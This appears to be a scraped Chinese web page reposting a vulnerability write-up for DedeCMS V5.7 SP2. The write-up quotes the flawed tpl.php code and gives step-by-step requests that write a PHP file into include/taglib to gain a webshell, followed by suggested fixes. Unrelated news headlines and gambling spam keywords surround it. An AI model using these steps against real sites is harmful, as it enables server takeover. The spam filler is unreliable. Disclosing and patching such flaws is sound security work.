• 出租车司机涉嫌猥亵女乘客 乐山警方:拘留10日 2019-06-21
  • 公众论坛官方网站首页·南方都市报·南方报业传媒集团 2019-06-21
  • 昔日本土最佳中锋终破门 激活他国家队俱乐部都受益 2019-06-19
  • 反俄毒招!世界杯遇尴尬:假球票1万余张,涉案金额1亿美金! 2019-06-14
  • 萨拉赫,你再不上 埃及队就要回家啦 2019-06-14
  • 中外学者齐聚拉萨 首届中国西藏拉萨阿里象雄文化国际学术研讨会召开 2019-06-09
  • 一语惊坛(5月22日):精忠报国是每一个热血青年的夙愿! 2019-06-06
  • 世界是动态发展与平衡的,不会静止不变,指导社会的理论也是不断发展完善的,由相对真理向绝对真理发展接近,这话不是我臆造的,来自学的大学课本根据马克思著作编写... 2019-06-06
  • 重庆 民俗文化进校园(我们的节日·端午) 2019-06-04
  • 太阳是宇宙加油站?不明物体多次靠近“加油”,看清后屏住呼吸 2019-06-04
  • 代理加盟 2019全新代理计划 赚钱+省钱双管齐下,独立平台,丰厚利润!

    您现在的位置: 波西亚时光ns > 织梦大学 > 织梦安全 >

    波西亚时光wegame修改器:dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    来源:未知 发布时间:2019-04-02热度: ℃我要评论
    DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,存在CSRF漏洞,通过申请友情链接的方式,诱使管理员点击,从而从 Referer 中拿到 后台路径,进而以管理员的身份写一句话到服务器上 GetShell 。...

    波西亚时光ns www.1y2c.com

    DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。

    漏洞详情

    织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。

    dede/tpl.php中第251行到281行

     

    csrf_check();

     

    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))

     

    {

     

        ShowMsg('文件名不合法,不允许进行操作!', '-1');

     

        exit();

     

    }

     

    require_once(DEDEINC.'/oxwindow.class.php');

     

    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);

     

    $content = stripslashes($content);

     

    $truefile = DEDEINC.'/taglib/'.$filename;

     

    $fp = fopen($truefile, 'w');

     

    fwrite($fp, $content);

     

    fclose($fp);

     

    1.由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

    2.可以看到将content直接写入到文件中导致可以getshell。但是这里的文件名经过正则表达式,所以必须要.lib.php结尾。

    注意: 这里还有一个csrf_check()函数,即请求中必须要带token参数。

    漏洞利用

    1.首先获取token 访问 域名 + /dede/tpl.php?action=upload。在页面源代码中获取到token值 

    dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    然后访问 :

    域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=[你的token值

    dedecms V5.7 SP2 友情链接CSRF+任意文件写入漏洞

    shell:域名 + /include/taglib/moonsec.lib.php

    漏洞修复

    1.禁止/include/taglib/此处写入文件。

    2.过滤恶意标签

    3.删除dede/tpl.php 文件

    本文地址://www.1y2c.com/dedecms_aq/1616.html

      责任编辑:波西亚时光ns

      发表评论

      评论列表(条)

      • 出租车司机涉嫌猥亵女乘客 乐山警方:拘留10日 2019-06-21
      • 公众论坛官方网站首页·南方都市报·南方报业传媒集团 2019-06-21
      • 昔日本土最佳中锋终破门 激活他国家队俱乐部都受益 2019-06-19
      • 反俄毒招!世界杯遇尴尬:假球票1万余张,涉案金额1亿美金! 2019-06-14
      • 萨拉赫,你再不上 埃及队就要回家啦 2019-06-14
      • 中外学者齐聚拉萨 首届中国西藏拉萨阿里象雄文化国际学术研讨会召开 2019-06-09
      • 一语惊坛(5月22日):精忠报国是每一个热血青年的夙愿! 2019-06-06
      • 世界是动态发展与平衡的,不会静止不变,指导社会的理论也是不断发展完善的,由相对真理向绝对真理发展接近,这话不是我臆造的,来自学的大学课本根据马克思著作编写... 2019-06-06
      • 重庆 民俗文化进校园(我们的节日·端午) 2019-06-04
      • 太阳是宇宙加油站?不明物体多次靠近“加油”,看清后屏住呼吸 2019-06-04
      • 都灵vs森索罗 六合彩凤凰信息网 球球大作战团过的人在哪里 我的世界1.0.0.7版正版 新疆时时彩的官网 足球任选9场玩法 apex英雄表情包 沃尔夫斯堡辉腾 龙族幻想楚子航 波叔一波中特全年 江苏快3开奖现场软件 浙江飞鱼实业董事长 qq飞车有哪些s车 龙之谷手游舞者舞灵 毕尔巴vs莱万特 波西亚时光手机版官网